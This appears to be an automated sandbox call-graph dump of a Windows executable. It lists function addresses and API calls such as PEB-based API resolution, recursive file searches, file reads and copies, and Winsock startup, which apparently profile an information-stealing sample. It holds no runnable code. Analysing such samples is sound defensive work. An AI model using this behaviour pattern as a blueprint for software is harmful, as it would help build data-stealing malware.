2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 14 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 10090->10099 10092 406761 10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 21 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 16 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 21 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 15 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 13 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 13 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 15 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 15 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 15 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 15 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 21 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 21 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 15 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap RtlFreeHeap 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 8218->8250 8220 4041b3 8223 4040bb 10 API calls 8220->8223 8226 4041c8 8220->8226 8221->8218 8225 4031e5 4 API calls 8221->8225 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 CloseHandle 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 CopyFileW 8278->8279 8279->8220 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 4067ad 8295->8296 8296->8282 8298 4031e5 4 API calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 13 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap RtlFreeHeap 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8903 410cd1 8908 412093 8903->8908 8906 412093 21 API calls 8907 410cff 8906->8907 8910 4120a5 8908->8910 8929 410cf1 8908->8929 8909 4120b3 8911 404056 6 API calls 8909->8911 8910->8909 8914 412100 8910->8914 8912 4120ba 8911->8912 8913 405b6f 6 API calls 8912->8913 8915 412152 8912->8915 8912->8929 8916 412125 8913->8916 8918 403fbf 7 API calls 8914->8918 8914->8929 8930 403d74 8915->8930 8916->8915 8921 412139 8916->8921 8922 41214d 8916->8922 8918->8912 8920 41218c 8926 402bab 2 API calls 8920->8926 8920->8929 8925 402bab 2 API calls 8921->8925 8924 402bab 2 API calls 8922->8924 8923 402bab 2 API calls 8923->8920 8924->8915 8927 41213e 8925->8927 8926->8929 8928 402bab 2 API calls 8927->8928 8928->8929 8929->8906 8931 403d87 8930->8931 8932 403ea3 8931->8932 8933 405b6f 6 API calls 8931->8933 8934 405b6f 6 API calls 8932->8934 8935 403da3 8933->8935 8936 403eb9 8934->8936 8935->8932 8937 4031e5 4 API calls 8935->8937 8938 4031e5 4 API calls 8936->8938 8945 403f6f 8936->8945 8939 403dbc FindFirstFileW 8937->8939 8940 403ed3 FindFirstFileW 8938->8940 8952 403e9c 8939->8952 8961 403dd1 8939->8961 8944 403ee8 8940->8944 8959 403f8d 8940->8959 8941 402bab 2 API calls 8941->8945 8942 402bab 2 API calls 8942->8932 8943 4031e5 4 API calls 8946 403e84 FindNextFileW 8943->8946 8949 405b6f 6 API calls 8944->8949 8950 4031e5 4 API calls 8944->8950 8955 403f75 8944->8955 8963 402bab 2 API calls 8944->8963 8973 40fa23 8944->8973 8945->8920 8945->8923 8947 403e96 8946->8947 8946->8961 8970 403bef 8947->8970 8949->8944 8951 403f50 FindNextFileW 8950->8951 8951->8944 8954 403f87 8951->8954 8952->8942 8953 405b6f 6 API calls 8953->8961 8956 403bef 5 API calls 8954->8956 8957 402bab 2 API calls 8955->8957 8956->8959 8960 403f7b 8957->8960 8958 403d74 16 API calls 8958->8961 8959->8941 8962 403bef 5 API calls 8960->8962 8961->8943 8961->8953 8961->8958 8964 402bab 2 API calls 8961->8964 8965 403f63 8961->8965 8962->8945 8963->8944 8964->8961 8966 402bab 2 API calls 8965->8966 8967 403f69 8966->8967 8968 403bef 5 API calls 8967->8968 8968->8945 8971 4031e5 4 API calls 8970->8971 8972 403c01 FindClose 8971->8972 8972->8952 8974 40fa39 8973->8974 8975 410293 8974->8975 8976 405b6f 6 API calls 8974->8976 8975->8944 8977 40ffcc 8976->8977 8977->8975 8978 4040bb 13 API calls 8977->8978 8979 40ffeb 8978->8979 8980 41028c 8979->8980 8983 402b7c 2 API calls 8979->8983 9028 41027d 8979->9028 8981 402bab 2 API calls 8980->8981 8981->8975 8982 403f9e 5 API calls 8982->8980 8984 41001e 8983->8984 8985 40a423 4 API calls 8984->8985 8984->9028 8986 41004a 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 41005c 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 410079 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 410096 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100b0 8993->8994 8995 4031e5 4 API calls 8994->8995 8996 4100cd 8995->8996 8997 4031e5 4 API calls 8996->8997 8998 4100ea 8997->8998 9029 412516 8998->9029 9000 4100fd 9001 40642c 5 API calls 9000->9001 9002 41013e 9001->9002 9003 410142 9002->9003 9004 41019f 9002->9004 9005 40488c 5 API calls 9003->9005 9007 4031e5 4 API calls 9004->9007 9006 410151 9005->9006 9009 41019c 9006->9009 9010 404866 4 API calls 9006->9010 9021 4101bb 9007->9021 9008 41022a 9018 413a58 14 API calls 9008->9018 9009->9008 9011 40642c 5 API calls 9009->9011 9012 410163 9010->9012 9013 410201 9011->9013 9017 406c4c 6 API calls 9012->9017 9026 41018e 9012->9026 9015 410205 9013->9015 9016 41022f 9013->9016 9014 403c40 5 API calls 9014->9009 9019 4126a7 7 API calls 9015->9019 9032 4125db 9016->9032 9022 410178 9017->9022 9023 41026e 9018->9023 9019->9008 9024 4031e5 4 API calls 9021->9024 9025 406c4c 6 API calls 9022->9025 9027 402bab 2 API calls 9023->9027 9024->9009 9025->9026 9026->9014 9027->9028 9028->8982 9030 4031e5 4 API calls 9029->9030 9031 412539 9030->9031 9031->9000 9033 40488c 5 API calls 9032->9033 9034 4125ec 9033->9034 9035 41269f 9034->9035 9036 4031e5 4 API calls 9034->9036 9035->9008 9037 412609 9036->9037 9039 4031e5 4 API calls 9037->9039 9044 41268f 9037->9044 9038 403c40 5 API calls 9038->9035 9040 41262a 9039->9040 9048 412675 9040->9048 9049 4124f1 9040->9049 9042 4031e5 4 API calls 9042->9044 9044->9038 9045 412663 9047 4031e5 4 API calls 9045->9047 9046 4124f1 4 API calls 9046->9045 9047->9048 9048->9042 9050 4031e5 4 API calls 9049->9050 9051 412503 9050->9051 9051->9045 9051->9046 9238 4049dc 9239 4031e5 4 API calls 9238->9239 9240 4049ef 9239->9240 9895 40cddd 9896 405b6f 6 API calls 9895->9896 9897 40cdee 9896->9897 9898 40ce06 9897->9898 9899 413a58 14 API calls 9897->9899 9900 405b6f 6 API calls 9898->9900 9907 40ce59 9898->9907 9901 40ce00 9899->9901 9903 40ce1c 9900->9903 9902 402bab 2 API calls 9901->9902 9902->9898 9904 403d74 20 API calls 9903->9904 9903->9907 9909 40ce52 9903->9909 9906 40ce45 9904->9906 9905 402bab 2 API calls 9905->9907 9908 402bab 2 API calls 9906->9908 9906->9909 9908->9909 9909->9905 9241 40ecde 9242 412093 21 API calls 9241->9242 9243 40ecfd 9242->9243 9244 412093 21 API calls 9243->9244 9245 40ed0d 9244->9245 9249 40e8df 9250 412093 21 API calls 9249->9250 9251 40e8f8 9250->9251 9252 412093 21 API calls 9251->9252 9253 40e908 9252->9253 9260 404b22 9253->9260 9255 40e91c 9256 40e936 9255->9256 9259 40e93d 9255->9259 9267 40e944 9255->9267 9258 402bab 2 API calls 9256->9258 9258->9259 9261 402b7c 2 API calls 9260->9261 9262 404b33 9261->9262 9266 404b66 9262->9266 9276 4049b3 9262->9276 9265 402bab 2 API calls 9265->9266 9266->9255 9268 4056bf 2 API calls 9267->9268 9269 40e952 9268->9269 9270 40e976 9269->9270 9271 4057df 14 API calls 9269->9271 9270->9256 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9270 9277 4031e5 4 API calls 9276->9277 9278 4049c6 9277->9278 9278->9265 9278->9266 9279 4139de 9288 413855 9279->9288 9281 4139f1 9282 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9281->9282 9283 4139f7 9282->9283 9284 413866 59 API calls 9283->9284 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9289 4031e5 4 API calls 9288->9289 9290 413864 9289->9290 9290->9290 9915 4116e7 9916 4117ba 9915->9916 9917 4117f1 9916->9917 9918 405b6f 6 API calls 9916->9918 9919 4117d0 9918->9919 9919->9917 9920 404cbf 8 API calls 9919->9920 9921 4117eb 9920->9921 9922 402bab 2 API calls 9921->9922 9922->9917 9310 4094e7 9311 404b22 6 API calls 9310->9311 9312 4094fe 9311->9312 9313 409554 9312->9313 9314 405b6f 6 API calls 9312->9314 9315 409514 9314->9315 9317 404b22 6 API calls 9315->9317 9322 40954d 9315->9322 9316 402bab 2 API calls 9316->9313 9318 40952d 9317->9318 9319 409408 16 API calls 9318->9319 9324 409544 9318->9324 9321 40953e 9319->9321 9320 402bab 2 API calls 9320->9322 9323 402bab 2 API calls 9321->9323 9322->9316 9323->9324 9324->9320 9333 4058ea 9334 4031e5 4 API calls 9333->9334 9335 4058fd StrStrA 9334->9335 9967 40d4ea 9968 404bee 6 API calls 9967->9968 9969 40d500 9968->9969 9970 40d5a0 9969->9970 9971 404bee 6 API calls 9969->9971 9972 40d529 9971->9972 9973 404bee 6 API calls 9972->9973 9974 40d537 9973->9974 9975 404bee 6 API calls 9974->9975 9976 40d546 9975->9976 9976->9970 9977 405872 4 API calls 9976->9977 9978 40d56d 9977->9978 9979 405872 4 API calls 9978->9979 9980 40d57c 9979->9980 9981 405872 4 API calls 9980->9981 9982 40d58e 9981->9982 9983 405872 4 API calls 9982->9983 9983->9970 9984 40a3ea 9985 40374e 6 API calls 9984->9985 9986 40a403 9985->9986 9987 40a419 9986->9987 9988 4059d8 4 API calls 9986->9988 9989 40a411 9988->9989 9990 402bab 2 API calls 9989->9990 9990->9987 9373 404df3 WSAStartup 9377 4091f6 9378 404b22 6 API calls 9377->9378 9379 40920b 9378->9379 9380 409222 9379->9380 9381 409408 16 API calls 9379->9381 9382 40921c 9381->9382 9383 402bab 2 API calls 9382->9383 9383->9380 10017 4117fe 10018 404c4e 6 API calls 10017->10018 10019 411888 10018->10019 10020 404c4e 6 API calls 10019->10020 10022 411925 10019->10022 10021 4118ab 10020->10021 10021->10022 10036 4119b3 10021->10036 10024 4118c5 10025 4119b3 4 API calls 10024->10025 10026 4118d0 10025->10026 10026->10022 10027 4056bf 2 API calls 10026->10027 10028 4118fd 10027->10028 10029 405872 4 API calls 10028->10029 10030 41190a 10029->10030 10031 405872 4 API calls 10030->10031 10032 411915 10031->10032 10033 413aca 4 API calls 10032->10033 10034 41191f 10033->10034 10035 405695 2 API calls 10034->10035 10035->10022 10037 4119c6 10036->10037 10039 4119bf 10036->10039 10038 4031e5 4 API calls 10037->10038 10038->10039 10039->10024 9387 40e880 9388 41219c 15 API calls 9387->9388 9389 40e88e 9388->9389 9390 41219c 15 API calls 9389->9390 9391 40e89c 9390->9391 10103 40e48a 10104 404bee 6 API calls 10103->10104 10106 40e4d0 10104->10106 10105 40e4f4 10106->10105 10107 405872 4 API calls 10106->10107 10107->10105 9488 410390 9489 404b22 6 API calls 9488->9489 9490 4103a5 9489->9490 9491 410409 9490->9491 9492 405b6f 6 API calls 9490->9492 9496 4103ba 9492->9496 9493 410402 9494 402bab 2 API calls 9493->9494 9494->9491 9495 402bab 2 API calls 9495->9493 9496->9493 9497 403d74 20 API calls 9496->9497 9500 4103fb 9496->9500 9498 4103ee 9497->9498 9499 402bab 2 API calls 9498->9499 9498->9500 9499->9500 9500->9495 10118 40ed96 10119 4040bb 13 API calls 10118->10119 10133 40edb0 10119->10133 10120 40ef90 10121 40ef87 10122 403f9e 5 API calls 10121->10122 10122->10120 10123 405ae9 6 API calls 10123->10133 10124 412269 6 API calls 10124->10133 10125 40ef61 10127 40ef6e 10125->10127 10129 402bab 2 API calls 10125->10129 10126 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10126->10133 10128 40ef7c 10127->10128 10130 402bab 2 API calls 10127->10130 10128->10121 10131 402bab 2 API calls 10128->10131 10129->10127 10130->10128 10131->10121 10132 402bab GetProcessHeap RtlFreeHeap 10132->10133 10133->10120 10133->10121 10133->10123 10133->10124 10133->10125 10133->10126 10133->10132 10134 40ef98 10135 404c4e 6 API calls 10134->10135 10136 40efb6 10135->10136 10137 40f02a 10136->10137 10149 40f054 10136->10149 10140 404bee 6 API calls 10141 40efda 10140->10141 10142 404bee 6 API calls 10141->10142 10143 40efe9 10142->10143 10143->10137 10144 405872 4 API calls 10143->10144 10145 40f008 10144->10145 10146 405872 4 API calls 10145->10146 10147 40f01a 10146->10147 10148 405872 4 API calls 10147->10148 10148->10137 10150 40f064 10149->10150 10151 402b7c 2 API calls 10150->10151 10153 40f072 10151->10153 10152 40efca 10152->10140 10153->10152 10155 405ecd 10153->10155 10156 4059b8 4 API calls 10155->10156 10157 405edf 10156->10157 10157->10153 9507 410c98 9508 41219c 15 API calls 9507->9508 9509 410ca8 9508->9509 9510 41219c 15 API calls 9509->9510 9511 410cb5 9510->9511 9512 412093 21 API calls 9511->9512 9513 410cc9 9512->9513 10227 41249c 10228 4056bf 2 API calls 10227->10228 10229 4124aa 10228->10229 10230 4057df 14 API calls 10229->10230 10235 4124ce 10229->10235 10231 4124be 10230->10231 10232 413aca 4 API calls 10231->10232 10233 4124c8 10232->10233 10234 405695 2 API calls 10233->10234 10234->10235 9517 40f49e 9518 40f4b6 14 API calls 9517->9518 9519 40f4a8 9518->9519 9520 40929e 9521 413b28 6 API calls 9520->9521 9522 4092a4 9521->9522 9523 405b6f 6 API calls 9522->9523 9524 4092af 9523->9524 9525 4092c5 9524->9525 9526 409408 16 API calls 9524->9526 9527 4092bf 9526->9527 9528 402bab 2 API calls 9527->9528 9528->9525 10254 407fa4 10255 407fb7 10254->10255 10256 402b7c 2 API calls 10255->10256 10258 407fee 10255->10258 10257 40800d 10256->10257 10257->10258 10259 4037be 4 API calls 10257->10259 10260 40803c 10259->10260 10261 402bab 2 API calls 10260->10261 10261->10258 9565 4090aa 9566 404b22 6 API calls 9565->9566 9567 4090c1 9566->9567 9568 4090d8 9567->9568 9569 409408 16 API calls 9567->9569 9570 404b22 6 API calls 9568->9570 